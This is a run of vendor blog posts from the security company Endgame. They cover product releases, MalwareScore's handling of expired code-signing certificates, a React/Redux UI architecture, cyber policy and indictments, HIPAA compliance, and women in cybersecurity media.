Today, we released the 2.5 version of the Endgame platform. This new release extends the scope, speed, and simplicity of our platform with new prevention, detection and response, and automated threat hunting capabilities. Our newest features Endgame Resolver™ with Endgame Artemis® enhancements provides analysts with the simplest visual experience and turn by turn guidance to contain and remediate threats before data theft or disruption.

This new release contains the following features:

• Endgame Resolver™ instantly identifies the origin and the extent of the compromise. This visualization answers the questions, "how did this get here?" and "what did this do?". Endgame’s enriched endpoint data and single-click pivots on any point in the attack visualization allows for instantaneous response.

• Tradecraft Protections have been updated with a new architecture that allows for sophisticated preventions based upon enriched endpoint events. Our unique autonomous endpoint architecture allows our preventions to operate even if the endpoint is offline, expanding our coverage of the MITRE ATT&CK™ matrix.

• Endgame Artemis® has a significantly improved NLU model, expanding its capabilities embedding guided response suggestions, whisper text. Artemis coverage now includes the Linux operating system.

• Endgame Arbiter™, cloud-based attack analysis engine, provides detailed insight of any malicious file to reveal artifacts of never-before-seen attacks.

• Unprecedented visibility with enriched endpoint data, adding registry and file changes to existing process events, network connection, DNS request, and netflow data. Event capture coverage is extended to Linux operating systems.

• Enhanced Threat Hunting automatically conducts patent-pending live memory forensics at the time of an alert, pinpointing attackers hiding in memory to stop resident attackers in seconds.

• Alert Response Improvements provide key investigator data with every alert, including token privileges, process memory capture, and process strings, automating forensic analysis of volatile data.

• Ongoing Protection Improvements provide increased effectiveness minimizing false positives in Endgame MalwareScore® and dynamic ransomware prevention. Endgame also enhanced patented exploit prevention, HA-CFI, to support Intel's newest chipset, Kaby Lake.

Endgame's Newest Features Continue to Augment Analysts & Provide Greater Protections

This new release empowers analysts of any skill level to defend against targeted attacks in seconds by delivering precise attack mapping and recommended response actions in plain English. Endgame's endpoint protection platform already provides more coverage of attacker techniques and technologies than any other single solution. Our commitment to transparency and public testing makes this easy to see. We also are the first solution to be validated beyond file based malware with a public simulation of a targeted attack by the MITRE Corp.  Our customers spend less time triaging alerts and more time on innovation and growth. 

For a detailed demo, reach out to demo@endgame.com

Malware authors frequently add signatures from expired or compromised certificates to bypass AV products that don’t validate those signatures correctly. Last week, researchers from the University of Maryland presented evidence that this technique is much more widespread than previously believed. Their research was highlighted at the ACM Conference on Computer and Communications Security and in an Ars Technica article. In addition to measuring the prevalence of this technique, the researchers also used it themselves to add two different expired certificates to five malicious ransomware samples. Obviously, just adding a digital signature, expired or not, to a piece of malware does not render it benign. However, according to the researchers, this technique fooled some big names in the industry including Crowdstrike, SentinelOne, Malwarebytes, TrendMicro, Microsoft, Symantec, Kaspersky, and Sophos.  MalwareScore^TM was one of the AV engines to successfully label each of the ten newly created samples as malicious. How did Endgame’s MalwareScore^TM pass the researchers’ test?

First, let’s review the purpose of signatures and certificates in allowing users to trust executable code. Certificates for signing code come from the same system and trust architecture as those used for HTTPS connections on websites. When executable code is properly signed with these certificates, it has been certified to originate from the organization that was issued the certificate and hasn’t been tampered with since. When certificates for code signing are issued, they're given an expiration date much like many organizations have a password expiration date. In order to prevent signed code from expiring with the certificate, as an optional step, a signed timestamp with the time and date of the signature can be attached. The timestamp is generally issued by a time server run by the Certificate Authority that issued the certificate. If a signed timestamp is not attached, then the signature should be considered invalid if the certificate that signed it is expired. This allows verification that the code was signed while the certificate was valid. As long as all of the pieces of information are there, the signature can be validated even after a signature has expired.

The researchers found that many AV engines were fooled by signatures that could not be validated. MalwareScore^TM, a machine learning based engine for detecting malicious executables, was not fooled. There are two main reasons for this. First, the features extracted from the tens of millions of training samples do not include information about the signature. The features are focused on a range of features, such as libraries imported, functions exported, and the name, size, and complexity of all the sections in the PE file. Since we do not train on signatures and certificates such as those used in these attacks, MalwareScore^TM is not fooled when invalid or expired signatures are added to a file, and returns an accurate label despite their presence.

Finding malicious executables is a tough enough problem that we complement our machine learning decisions with limited whitelisting on hashes and signatures. This added layer helps reduce false positives on customer deployments. Imprecise validation of certificates could have led us to trust some of the invalid signatures added to the ransomware tested by the researchers and falsely label them benign. Limiting the certificates that we whitelist, and thoroughly testing our certificate validation code gives us confidence that our whitelisting only affects legitimate software. The research presented last week by the University of Maryland provides us additional confirmation that our approach helps detect a broad range of techniques while still keeping the false positives low.

MalwareScore^TM has already been tested by manyindependentagencies and we’re happy that these academic researchers determined our malware detection capability to be resilient against a particular attack. We also continually and rigorously test MalwareScore^TM internally to validate that it’s the best AV engine on the market. However, it is important to remember that no single protection method is perfect. That is why Endgame pairs MalwareScore^TM with other industry- leading protections for process injection, privilege escalation, credential theft, and many others. Endgame’s layered approach to security is the most effective at stopping a broad range of attack vectors. As the University of Maryland research confirmed, this includes stopping the latest creative malware-based attacks that slip through other AV solutions, but are quickly detected within the Endgame platform.

Last year, we had that rare opportunity to reflect upon our UI architecture and evaluate whether it would continue to serve us going forward. In the end, we decided to take a fundamentally new approach. Under the new architecture, the UI would now be a client-side application filled with visualizations and complex interactions. Our frontend team critically reviewed our previous UI application to determine whether it would scale with the new platform architecture. In the end, we determined it was best to rewrite our UI from scratch. Our new patterns and our new development strategy had to allow our engineers to rapidly work in parallel on new features.

Architecting a UI has many long term implications and requires thoughtful debate. Our team scrutinized existing projects, including what worked, what didn’t work, and how we could fix these issues in the future. We researched emerging technologies and shared our findings with other engineers. As a team, we developed shared understanding around key pieces of the design to arrive at the new architecture we use today. This post will walk through the process and decisions we made along the way toward building our UI.

Step One

The first decision in designing our architecture involved moving toward functional reactive programming by using purely functional view components. View components - the components responsible for visualizing data to the user - would be stateless. A view component renders based upon the data it was given and never has any notion of internal state. If all view components in your application are purely functional, then the UI will always look the same given the same application state. The view components are simply a function of the data.

This would be a huge change for our team. We were used to building traditional MVC applications with stateful views. This change toward functional view components moved us into the minority of the JavaScript community at the time. Popular JavaScript frameworks, such as React and Angular, maintained state in views, and most example code and open source libraries for those frameworks did the same.

Creating purely functional view components allows us to completely isolate presentation concerns. Our view components now only have one responsibility: to present the data to the user. The code for our views becomes simpler, easier to test, and easier to reason about. After agreeing upon this first principle, we were able to move forward to the next decision in our design.

Where Does the Application State Live?

The initial decision to use purely functional view components influenced our next decision: centralizing our application state. There would be one source of truth which contained all of the data for our application. Our views would read from this state. Following this pattern would make it easier to infer the state of our UI. Instead of having to reason about the state of the UI by collecting small pieces of state spread throughout the application, all of our application state is organized in one place. We used the JavaScript library Redux, which was designed for this exact purpose, as our application state container. There are three key components to Redux: the store, actions and reducers.

• The store is a plain JavaScript object which describes your application state. This is where the data for your application resides, and is the single source of truth for your application. Your view components read from this store and present data to the user.

• Actions are objects dispatched by view components (or elsewhere in your application). They describe an event that happened in the application. Actions must always contain a “type” property, which is a string describing the event. Actions may also include other properties containing data pertaining to the event.

• Reducers are functions which take actions and the current state of the application and synchronously return the new state of the application as a result of applying that action. Reducers are the only piece of the architecture which may modify the store.

Below is a diagram which shows our architecture at this stage: purely functional view components with Redux as a state container.

Due to our first decision of using purely functional view components we know that views strictly read in data from the store and are a function of the data they are given. As a result, the views only update when the store changes. The store only changes when actions are fired. It is very easy to model simplistic UI workflows using this architecture:

1. The app loads and the store is defaulted to an initial state.

2. The view reads from this state and renders a page with a button.

3. The user clicks the button on the view which dispatches an action.

4. The reducer receives the action and modifies the store accordingly.

5. The view renders the new data from the store.

Saga Patterns

So far I have described how we chose to handle interactions between our users and the browser. However, we needed a way for our application to deal with side effects and asynchronous operations, such as fetching data from a backend service. We decided to use the saga pattern, a common pattern for handling business processes in event-sourced systems, to handle side effects.

Think of a saga as a separate thread in your application. It is a long-running process for handling business transactions and the errors which may arise during those transactions. A saga listens for events (Redux actions in our case) and then dispatches commands to other parts of the system. Actions may be dispatched by users creating side effects, by a backend service responding to a side effect, or by our application during a business process. Using sagas allows us to model these three actors in our system: the user, the application, and the server.

We needed to implement sagas in our current architecture. We initially considered writing our own sagas. After researching existing libraries we found the JavaScript library redux-saga. It was well-designed and aligned nicely with our design goals. Our team agreed to use redux-saga to implement our saga pattern. Redux-saga is a Redux middleware, that reads from the Redux store and receives and dispatches actions. When an action is dispatched, the reducer will apply the action to the state and will pass the action along to the sagas. An updated diagram below reflects our architecture with sagas included.

Example Workflow

Now that I've illustrated how we handle user interactions and asynchronous operations like HTTP requests, let's take a look at a simple example of how this all comes together. 

Imagine you are building an application which translates a message from Spanish to English. There is an input where you type your desired message and a “Translate” button. The translation is done via a backend web service which will respond with the English translation. Our application could look something like this:

1. When the application loads initially there is no current translation on the page and the application is not currently fetching a translation. Our store has an initial state which our view reads from. The store looks like this:

2. The user types “Hola” into the input and clicks the “Translate” button.​

3. The click handler for the “Translate” button grabs the value from the input and dispatches an action with the type property set to “userClickedTranslateString” and a userInput property set to “Hola”.

4. The reducer receives this action and changes the application state to reflect that a request is pending by setting the isLoading property to true. Our reducer does not care about the value the user typed in and ignores the userInput property.

5. Since the store has changed, the view re-renders to reflect the new state of the application. Because the isLoading property is true, our application renders a loading spinner and a message informing the user that their message is being translated.

6. The saga also receives the “userClickedTranslateString” action. Unlike the reducer, the saga does care about the userInput property on the action. It reads this property and sends it in an HTTP Request to the backend service.

7.  When the backend service responds with a translation (“Hi” in our case), the saga dispatches an action with the type property set to “serverTranslatedString” and a translationResponse property on the action containing the translation returned from the HTTP Request.

8. The reducer receives this action and updates the state accordingly. The request is no longer pending so it sets isLoading to false, and sets the store’s translation property to the value of the translationResponse property on the action.

9.  Since the store has changed, the view will re-render to reflect the data from the store. The isLoading property is now set to false. The spinner is removed and the translation property from the store is rendered to the user.                 

This was an overly simplified example to help clarify the roles and responsibilities of each of the pieces of our frontend architecture. Each piece has a single responsibility and reflects the output of comprehensive and thoughtful debate and research to help us craft the most flexible and maintainable UI for the Endgame platform.

Angular vs React

The most contentious decision we had when designing our architecture was about the least important piece -  which view library we would use. Specifically, this debate was between using React or Angular. This is a widespread and spirited discussion in the JavaScript community and has produced useful insights about the strengths and weaknesses of each library.  Our team believes it is largely subjective and boils down to preference. Angular is a full framework which can support multiple parts of your application. React is a simple view library instead of a framework. The other pieces of your application will either need to be integrated with other libraries or you have to write them yourself.

We were confident we could build an impressive and scalable UI application with either library. Following our own spirited debate about which library to use, we eventually landed on using React. With React, you create your view components using an HTML-looking syntax called JSX and can pass the requisite data via a mechanism called props. When the value of a prop changes on a component, React will force that component to re-render. As a developer, you simply write a “render” function which returns the markup for your component. You never have to manually add or remove elements from the DOM. React does all of this for you under the hood via reconciliation.

Next steps

There are many high-level architecture decisions required to build an impressive UI. Importantly, we agreed upon an architecture first and chose libraries to suit our decisions. Solidifying the architecture first provided us the flexibility to then make the subsequent decisions free from constraint and to focus on the best tool for the job. We highly suggest this method to anyone starting a greenfield project. Stay tuned for my next blog post where I will cover the code and patterns we developed while building Endgame’s UI with this architecture!

Yesterday, the House Foreign Affairs Committee voted on numerous bills by voice vote. The Cyber Diplomacy Act (CDA) was included in this legislative push. First introduced in September, the Cyber Diplomacy Act has bipartisan support with nine Democrat and six Republican cosponsors. The CDA covers a broad range of issues which together provide the foundation for the U.S. to “work internationally to promote an open, interoperable, secure, and reliable information and communications infrastructure” in support of U.S. national security and economic interests.

The CDA is a response to the growing reach, objectives, and impact of cyber attacks on the U.S. economic and national security and the absence of a broader strategy to counter and deter these attacks. The CDA calls out six threats: Russia, China, Iran, North Korea, terrorists, and criminals. In the last few months alone, Russia, Iran, and North Korean-linked attackers were found within U.S. critical infrastructure, and China has been linked to infiltration against global tech giants, largely in the U.S. WannaCry, NotPetya, and BadRabbit ransomware attacks hit the public and private sector globally, with new variants of destructive malware on the rise as well. 

To counter these threats, the CDA (if passed) would require a “strategy relating to United States international policy with regard to cyberspace”. The strategy would be required to address norms, deterrence and related policy tools, and the applicability of current international law to cyberspace.  

The CDA builds upon growing demand for a strategy to curtail cyber attacks against the U.S. As an initial step, President Trump signed a cybersecurity executive order in May. It required a report within 90 days on the “Nation's strategic options for deterring adversaries and better protecting the American people from cyber threats” as well as an additional report documenting an “engagement strategy for international cooperation in cybersecurity.” In the absence of these reports, many in Congress have been vocal, calling for a U.S. strategy for cybersecurity. Earlier this year, Sen Angus King (I-ME) noted, “The country has no strategy or doctrine around cyber attacks...If our adversaries don't know we have it, it can't act as a deterrent.” During the Senate Armed Services Committee, Sen John McCain (R-AZ) similarly noted, “This committee has not been shy about expressing its displeasure over the lack of policy and strategy for deterring, defending against and responding to cyberattacks.” Just last month, King simply stated the U.S. needs to determine “if x, then y.”

How would the CDA address this current gap in strategic cyber policy? First, the CDA makes two major organizational changes at the Department of State: the creation of the Office of Cyber Issues and the establishment of an Ambassador for Cybersecurity. Both of these organizational changes offset current reorganization plans, including the vacacny left by the resignation of the Department of State’s top cyber diplomat, Chris Painter, and elevate the importance of cyber diplomacy. The Ambassador for Cybersecurity would “lead all U.S. engagement on issues pertaining to cybersecurity strategies, standards, and practices.” Co-sponsor of the CDA, Rep. Ed Royce (R-CA), stated, “The US is increasingly under attack by foreign actors, and these actors are online. Now, more than ever, we need a high-ranking cyber diplomat to prioritize these efforts and work with foreign governments.”

Next, the CDA takes broad steps at pursuing global international cooperation. In conjunction with the technology companies, security researchers and other relevant stakeholders, the CDA would establish U.S. policy to evaluate and implement global norms - those rules of the road guiding the appropriate behavior in cyberspace. In addition, the CDA would require evaluation of the applicability of the Law of Armed Conflict to cyberspace, and prohibit attacks such as those aimed at critical infrastructure or commercial espionage for corporate gains. Interestingly, the CDA does not reference 'cyber war' explicitly. It does reference proportionate countermeasures by victims of cyber attacks, and the necessity for greater deterrence frameworks. It also would require a review of policy tools available to the President to deter and limit escalation, including an assessment of the efficacy of these tools to date. Importantly, the CDA also mandates adherence to extant international cyber agreements, including nine existing bilateral agreements.

Finally, the CDA begins to broaden the realm of cybersecurity beyond attacks, and focuses on the internet’s contribution to democracy, freedom of speech, and access to information. This is important, as many of the key threats listed in the CDA already view the internet as a means for information control albeit through cyber attacks and/or disinformation. Recognizing this, the CDA links policy to protecting human rights, and assessing foreign countries by the extent to which they “filter, censor, or otherwise block or remove nonviolent expression" which interestingly is broad enough to include techniques such as astroturfing. Moreover, the CDA calls for an evaluation of alternative concepts to norms offered by foreign countries. Together, these aspects of the policy are a negation of the push by China, Russia, and many other countries for the notion of cyber sovereignty -  governmental control of information within their borders. These concepts run counter to the multi-stakeholder model put forth by the U.S. and the U.N. If passed, the inclusion of these fundamental rights within the CDA would be a strong signal of U.S. commitment to a free and secure internet and democratic freedoms.

The CDA still has many hurdles to overcome before potentially becoming a law. However, at a time when the ACDC Act legalizing hacking back seems the most prominent cyber policy proposal, this week’s passage of the CDA by the House Foreign Affairs Committee is welcome progress. The CDA would not address every concern regarding the modernization of U.S. cyber policy and responses, but it would make significant progress toward asserting the U.S. as a key leader in shaping global norms toward democratic freedoms and appropriate behavior in cyberspace. Absent such steps, the global leadership vacuum will be filled by Russia, China, and other authoritarian regimes in ways that run counter to internet freedoms and global stability.

Last week, Endgame CEO Nate Fick and The New York Times reporter Nicole Perlroth discussed the future of cyberwar and its impact on national security at the Computer History Museum in Mountain View, CA. The conversation ranged from the asymmetric nature of today’s cyber attacks to the difficulty of attribution to how the US government can successfully deter its enemies in the digital domain. The entire conversation is available online, with the key topics summarized below.

The Decreasing Barrier to Entry

Nation states and criminal groups now have access to tools that were once reserved for the highest classified environments of great powers. For instance, recent global ransomware attacks such as WannaCry and NotPetya leveraged the leaked exploit EternalBlue. Although this is changing the game, attackers also continue to achieve great success from much less sophisticated attacks that take advantage of expanding connectivity. The most connected organizations may also be the most vulnerable due to the expanding attack surface, which is largely driven by the internet of things and the accessibility of social media information. Even organizations with robust defenses are now compromised thanks to the rise of social attack vectors - such as malware implanted in take-out menus or word documents. The combination of accessibility of these open source digital weapons and an expanding attack surface has dramatically lowered the barrier to entry for attackers.

The Cyber Domain Mimics Geopolitics

The escalation of digital offense mirrors the ebb and flow of geopolitical conflict and cooperation. Following World War II, the U.S. and democratic countries shaped a global order that helped deter great power war and limit the escalation of conflict at a global scale. The post-war deterrence system no longer is effective. Today, deterrence stops at the keyboard. Just as Russia has become more brazen in the physical world, such as the invasion of Crimea, their cyber activity similarly has a growing range of target sets and impact. Similarly, China seeks more global leadership across a range of issues, and is pushing forth its own narrative and objectives to foster cyber sovereignty and state control of digital information. In some ways, their behavior has changed following the 2015 Sino-American agreement, but these changes are more so in tactics and techniques. Alternatively, North Korea’s behavior in the digital domain mimics their increasingly brazen and unpredictable behavior in the physical realm. In short, a geopolitical lens is essential to understand the current and future range of attacks in the cyber domain.

A Major C-Suite Change in Addressing Cyber Attacks

Over the last five years, there has been a dramatic shift in the C-suite when it comes to cyber attacks. Five years ago, it was sufficient for executives to tell the board of directors that their defenses were good, and the CIO had information security covered. That is no longer the case, with executives fired, class action lawsuits filed, and growing reputational, financial, and even physical damage following cyber attacks. The C-suite no longer can view cyber risk as exogenous to a business risk framework. Increasingly, cyber risk is integrated into the larger business risk framework. In general, cyber risks can be categorized into those risks which must be accepted, those which can be transferred (such as to insurance), and those which must be mitigated via people, processes, and technology. Moreover, because of the feeling of helplessness following these attacks, there is a growing conversation, and even implementation, of hacking back. Problems of attribution, limited success, and the lack of escalation dominance (among numerous reasons) render hacking back a dangerous, unsuccessful, and illegal course of action.

The Laws of Armed Conflict Must Extend into the Cyber Domain

The perspective that cyber attacks only warrant a cyber response has limited the development of doctrine and policy to deter these attacks. Cyber attacks are a tool of statecraft, the effects of which should fall under the law of armed conflict. By decoupling cyber attacks as something solely within the cyber domain, a broader and more coherent response framework can be employed through the laws of armed conflict. This doctrine must include proportionality and noncombatant immunity. Responses to cyber attacks should be proportional to the effects of the attack, similar to the law of armed conflict in the physical world. Importantly, proportionality of response is not limited to a cyber tit-for-tat framework, but opens up the range of potential responses such as military or economic retaliation. In addition to proportionality, noncombatant immunity also is an essential component of the laws of armed conflict. Attacking an energy grid may fall within the laws of armed conflict during war time, but targeted cyber attacks on Ukrainian hospitals by Russia or the disruption of British hospitals due to WannaCry not only may violate laws of armed conflict during wartime, but also may violate peace time behavior. Until a declaratory and escalatory framework is formulated in adherence to the laws of armed conflict, escalation will continue. Importantly, the government should maintain the monopoly on the use of force, and global norms must help shape the appropriate rules of the road.

The discussion concluded by focusing on the cumulative effects of these trends, and whether any theorists may be the most applicable when contemplating the future of war. Nate drew upon St. Augustine and Thucydides, with the roots of just war theory and the steadfast nature of human conflict. Just because we have a new set of tools, it doesn’t mean these rules are no longer applicable. In fact, they are more necessary now than ever. Given how many ‘wake-up’ calls and watershed moments have occurred over the last few years, there is growing concern about the ongoing, creeping nature of these attacks on the erosion of confidence in the connected world and global institutions. From credit scores to bank balances to electoral outcomes, adversaries are increasingly finding ways to undermine confidence in those core institutions that have prompted global economic and democratic development for the last seventy years.

When WannaCry ransomware paralyzed and created chaos throughout Britain’s National Health System earlier this year, it became abundantly clear that hospitals and healthcare providers are not immune to opportunistic or targeted attacks. As targeted attacks continue to rise, endpoints and servers that access electronic personal health information (ePHI) and electronic medical record (EMR) are prime targets for criminals and nation-state attackers. In fact, healthcare is among the top industries targeted by cyber attacks, as adversaries seek not only health records, but personally identifiable information such as social security numbers and birth dates, as well as contact information such as phone numbers.

Importantly, this wide range of personal and health data is all protected under the Health Insurance Portability and Accountability Act (HIPAA). The Department of Health and Human Services (HHS) investigates organizations for failing to comply with safeguards to protect the entirety of health-related information. If your organization is attacked and any of this broad range of data is breached, your organization could be found in violation of HIPAA. In 2016, HIPAA violations exceeded $23 million, and currently surpass $17 million in 2017.

Fortunately, organizations can now use the same technology to achieve HIPAA compliance and protect against these targeted attacks. To validate this, we engaged Coalfire Systems Inc. (Coalfire), a leading provider of industry-specific cyber risk management and compliance services, to conduct an independent technical assessment of our platform against the requirements of the HIPAA Security Rule. We are pleased to announce that the Endgame platform is HIPAA compliant, providing full-stack protection against even targeted attacks.

The Endgame platform enables companies to fill this gap and provide comprehensive coverage against a broad range of attacks, while helping companies remain HIPAA compliant.

Based on the sample testing and evidence gathered during Coalfire’s assessment, the Endgame platform provides comprehensive coverage, including for the following standards:

• Protection from Malicious Software (164.308(a)(5)(ii)(B)): Endgame implements security measures sufficient to reduce risks and vulnerabilities to a reasonable and appropriate level and also complies with §164.306(a): Security Standards, Administrative Safeguards.
• Security Incident Procedures (164.308 (a)(6)(i)): Endgame implements policies and procedures to address security incidents.
• Response and Reporting (164.308(a)(6)(ii)): Endgame identifies and responds to suspected or known security incidents; mitigates, to the extent practicable, harmful effects of security incidents that are known to the covered entity or business associate; and documents security incidents and their outcomes.
• Audit Controls (164.312(b))): Endgame implements hardware, software and/or other procedural mechanisms that record and examine activity in information systems that contain or use electronic protected health information.

During the assessment, the Endgame platform also effectively mitigated various forms of malicious attacks, including:

• Malware protection at file execution (prevents execution on installation)
• Malware detection for created and modified files
• Application exploits prevention (prevents execution on installation)
• Application exploits detection
• Ransomware prevention

In addition to these assessments, Endgame also proved effective in numerous other areas. For instance, our sensor could not be disabled by unauthorized users. Endgame also provides additional features, such as those for investigations (hunting for endpoints data), fileless attacks, whitelisting of files or applications, IOC search on file, network, process, registry and users. In fact, the healthcare company, Martin’s Point, recently replaced their AV with Endgame, expanding their coverage of attacker techniques while meeting HIPAA requirements.

Endgame’s layered approach has already proven effective at protecting some of the world’s most sensitive data. This assessment validates these defenses, and further solidifies the platform among the first to surpass HIPAA compliance requirements to further protect the healthcare industry while ensuring compliance to existing security and privacy rules.

Healthcare providers everywhere face increasingly sophisticated attacks that regularly evade legacy defenses. Coalfire, a leading HIPAA assessor, has validated the Endgame platform as HIPAA compliant. Our platform’s full stack prevention, accelerated detection and response, and automated hunting across the breadth and depth of the MITRE ATTACK^TM matrix was assessed as meeting or exceeding requirements to protect patient data from state and criminal attackers. With HIPAA compliance recognized, including meeting the key technical requirements in the HIPAA Security and Privacy Rules, the Endgame platform not only protects organizations from advanced threats, but also ensures those in the health sector are also in compliance with HIPAA standards while protecting some of the world’s most sensitive data.

A comprehensive white paper provides additional information on the Coalfire assessment. To receive a detailed demo, reach out to demo@endgame.com. 

After six years of coordinated cyber attacks and data theft, the U.S. Department of Justice (DoJ) issued indictments yesterday against three members of the Chinese threat group known as APT 3 or Gothic Panda. The indictments specifically address data theft and corporate espionage against Siemens, Moody’s Analytics, and Trimble, a company that develops navigation satellite systems.  These indictments alone are noteworthy due to their scale and scope. However, they become even more relevant when exploring them in conjunction with the series of indictments and arrests for cyber crimes that have occurred throughout 2017.

The DoJ issued the first high profile indictments for cyber criminal activity against five members of the Chinese PLA for corporate espionage in 2014. Importantly, there have been as many high profile indictments in 2017 as there were between 2014-2016. Indictments are becoming a prominent tool by the U.S. government to hold cyber attackers accountable, while countering the naysayers who claim attribution is simply too difficult in cyberspace. This is an important trend, one which likely will continue into 2018.

A Brief History of Recent Indictments

Prior to 2017, high profile indictments were few and far between. The indictments against the PLA members in 2014 ostensibly demarks the first, prominent use of indictments to counter cyber theft and other crimes. This was an important case, as it specified espionage for corporate gain against at least five U.S. corporations, and likely played a major role in shaping the 2015 U.S.-Sino agreement specifically against these kinds of activities. The global botnet, GameOver Zeus, was also taken down in 2014. An indictment for the botnet’s key administrator, Evgeniy Bogachev, was also issued. He was later sanctioned at the end of December 2016 as part of the U.S. response to Russian interference in the U.S. presidential election.

Between 2015 and 2016 there were a few high profile indictments, but certainly not at a pace comparable to 2017. In 2015, indictments were issued against nine people based in Ukraine and the U.S. for one of the largest securities fraud schemes. The group stole not-yet-released press releases containing financial information and used the information to inform trades. In 2016 there were two significant cases of indictments. The first and most prominent were the indictments against seven Iranians for widespread attacks against U.S. financial institutions and the Rye dam. Seven months later the DoJ issued indictments against a Russian national for hacking DropBox, LinkedIn, and Formspring and stealing data and damaging computers.

In contrast, there have been numerous indictments and arrests of cyber criminals in 2017 across the globe that have received little attention compared to the attacks. Specifically in the U.S. there have been at least four high profile indictments including yesterday’s against the members of APT 3. In March, two Russian nationals and FSB agents were indicted for the Yahoo breach, as well as compromising Gmail and other email accounts. A Canadian national was arrested for supporting the Russians, and there are indications today that he will change his plea to guilty. In August, A Chinese national was arrested for his role in the 2014 OPM breach. Just last week an indictment was issued against an Iranian who had previously worked on behalf of the Iranian military. The U.S. is also increasingly working with international law enforcement. Earlier this year, 19 indictments were issued and accompanied by the arrests of cyber criminals connected to international money laundering and fraud.  

The Value of Naming and Shaming

This brief history of recent indictments for cybercrimes reveals the increased reliance on indictments, while also highlighting just how few arrests have actually occurred compared to the size and scope of breaches. So what is the value of indictments? First, as the OPM and Yahoo examples illustrate, arrests still can occur and must be pursued. Indictments are an essential component of a broader deterrent strategy. Indictments, and ideally arrests, signal the potential consequences of cyber crime, demonstrating that the government is responsive to attacks on the private sector. They also signal attribution capabilities and help counter the common narrative that attribution is impossible.

In the fog of geopolitical tensions, indictments also provide transparent communication between governments, signaling acknowledgement of involvement in various malicious cyber activities. It is notable that the majority of the indictments stop short of linking the accused to their government. Yesterday, U.S. attorney Soo C. Song specified, “It is not an element or subject of this indictment that there is state sponsorship.” Other officials interviewed disagreed, noting that these attacks were state-sponsored and directed. This is an especially important delineation for attacks linked to China, who recently reaffirmed their commitment to the 2015 U.S.-Sino agreement against specifically this kind of cyber theft. There are significant implications for directly naming a foreign government as the attacker, including potential retaliation that escalates the cyber activity or spills over into military, economic, or diplomatic domains. Indictments that stop short of connecting the crimes to a foreign government can provide greater transparency between governments, while also putting adversaries on notice that attribution has occurred and may instigate further responses.

Looking Ahead into 2018

The growing implementation of indictments throughout 2017 has received little attention despite the vocal demand for U.S. responses to cyber attacks. Clearly, indictments alone are not sufficient for a broader deterrent, but they are foundational to any comprehensive cyber strategy. With estimated costs and the impact of cyber crime rising for the foreseeable future, the DoJ will likely continue to issue indictments as a foundational tool to counter these threats. There already are rumors that the DoJ may indict six Russian nationals in 2018 in connection with the 2016 DNC hack. As indictments increasingly play an integral component in the U.S. response to cyber crime throughout 2018, it will be necessary to see if and how they change the risk calculus of both nation-state and non-state attackers.

Since 2013, the Worldwide Threat Assessment of the U.S. Intelligence Community has listed the cyber threat as the number one national security and economic security threat. From interference in global elections to critical infrastructure attacks to compromising worldwide banking systems, adversaries increasingly pursue digital means to achieve various objectives, including espionage, financial gain, and undermining economic and political stability. Given the growing importance of the cyber threat, it is disconcerting that so much of the coverage excludes perspectives from female experts. To address this gap, last night Endgame hosted a Foreign Policy Interrupted workshop on media training for women who work at the intersection of cybersecurity and national security.

FPI Interrupted co-founder Elmira Bayrasli led the workshop that focused on the fundamentals for getting published and how-to tips for a range of media coverage. Participants from NGOs, think tanks, and industry learned the art of the media pitch and shared their own experiences and frustrations with trying to break through the paper ceiling, where 82% - or 5 out of 6 - names mentioned in print media are men. The data isn’t much better for television coverage, especially for national security. As the Media Matters analysis demonstrates in the chart below, over three-quarters of national security guests are men. Moreover, when women are guests for national security or cybersecurity issues, they are frequently included for discussions on gender, and not their expertise.

Augmenting more balanced representation in media coverage is important well beyond fairness, equality, and professional advancement (although these certainly are important). First, meaningful inclusion of women in national security discussions positively impacts national security issues such as peace negotiations and stability. Diversity of all kinds has further been associated with more innovative and creative solutions, the kind that are desperately needed given the growing complexity of geopolitical, cybersecurity challenges. Second, the skewed media coverage impacts the next generation of national security and cybersecurity experts. Both the national security community and tech industry already struggle with well-publicized pipeline and retention challenges. Cybersecurity falls at the intersection of these two, and brings the challenges of both national security and tech industries. Given the current state in each of these industries, the number of women in cybersecurity remains stagnant at around 10% of cybersecurity professionals. The lack of media coverage of women only exacerbates these issues.

More balanced representation of female cybersecurity experts in media is a crucial step to not only better address the growing and diverse cybersecurity challenges, but it also impacts the cybersecurity workforce shortage and retention. At Endgame, we’ll continue to advocate and sponsor greater representation across all groups. Organizations that focus on amplifying the voice of women (such as Foreign Policy Interrupted) and growing the pipeline (such as Warrior Women) are crucial to addressing the imbalance. The numerous technical and geopolitical challenges within cybersecurity are only expanding in magnitude and breadth. It is essential all voices are included to produce the most innovative and creative defenses and strategies in this increasingly complex geopolitical environment.

Many security products provide a never-ending stream of alerts, and fail to provide the necessary context and capabilities to support the next stage of analysis. For an analyst to grasp the implications and take action, more context is required, such as the severity and confidence of the alert, was it targeted, and whether it is an anomaly or has previously occurred.  At Endgame, our focus on the user at every aspect of development ensures we move past this bare minimum of providing an alert, and instead fully augments the speed, scope, and skills available for secondary analyses. This is especially evident in our latest release, Endgame Arbiter®, our cloud-based threat analysis platform that automates many of the key analytic pain points while providing additional context and insight into the data.

As a solutions provider working with customers and practitioners for over twenty years, I understand the constraints and the difficulty customers encounter daily. Every feature that goes into the Endgame platform is evaluated for its impact to improve the scope, speed, and skills of our customers. Endgame Arbiter® is the latest validation of this approach, providing customers the necessary range of information and capabilities required to take action, without having to hire a large staff of expert reverse engineers. Below are some of the key pain points addressed and capabilities provided within Endgame Arbiter®.

Problem: Overcoming Alert Fatigue

Every day, overworked security analysts must make the decision whether to investigate the root cause of an event or move on to incoming alerts.  Analysts decide on the spot if an alert requires digging deeper, or if they should focus on managing the onslaught of inbound alerts from their dozens of security products. There simply are too many alerts that it is impossible for even the best resourced team to conduct due diligence every time there is an event.

Solution

As the CTO of an endpoint security product, one of my top priorities is to provide relevant and actionable alerts, limiting the deluge of alerts instead of augmenting it. With this in mind, many features have been built into Endgame that enable alert triage with with ease, including alert outlier analysis, investigation prioritization with MalwareScore™, one-click retroactive whitelisting, Endgame Resolver™ attack visualization, and Endgame Artemis® guided response actions. These features accelerate the time it takes to triage an alert and elevate the ability for lower tiered analysts to participate in the triage process. But how does the analyst make the determination to leverage these features? These are all essential capabilities, but more is required to enable analysts to quickly distinguish between alerts that require immediate attention and those that don’t take priority.

